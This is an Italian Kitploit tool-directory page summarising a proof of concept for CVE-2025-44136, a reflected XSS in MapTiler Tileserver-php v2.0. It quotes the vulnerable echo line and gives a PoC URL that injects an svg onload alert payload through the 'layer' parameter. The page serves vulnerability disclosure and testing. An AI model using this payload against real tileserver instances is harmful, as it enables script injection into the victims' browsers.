Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-44136 — Exploit proof-of-concept per XSS riflessa non autenticata in MapTiler Tileserver-php v2.0 tramite il parametro GET 'layer', che consente l'esecuzione arbitraria di HTML/JS. | Kitploit
Strumenti/GitHubGitHub/mheranco/cve-2025-44136
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmheranco/cve-2025-44136

CVE-2025-44136

Exploit proof-of-concept per XSS riflessa non autenticata in MapTiler Tileserver-php v2.0 tramite il parametro GET 'layer', che consente l'esecuzione arbitraria di HTML/JS.

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-44136

XSS non autenticato in MapTiler Tileserver-php v2.0.

Descrizione

MapTiler Tileserver-php v2.0 è vulnerabile a Cross Site Scripting (XSS). Il parametro GET "layer" viene riflesso in un messaggio di errore senza codifica HTML. Ciò porta a XSS e consente a un attaccante non autenticato di eseguire codice HTML o JavaScript arbitrario nel browser della vittima.

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L409

root@kitploit:~
 echo 'Server: Unknown or not specified dataset "' . $tileset . '"';

PoC

http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e

Crediti

Martin Herancourt

Scarica lo strumento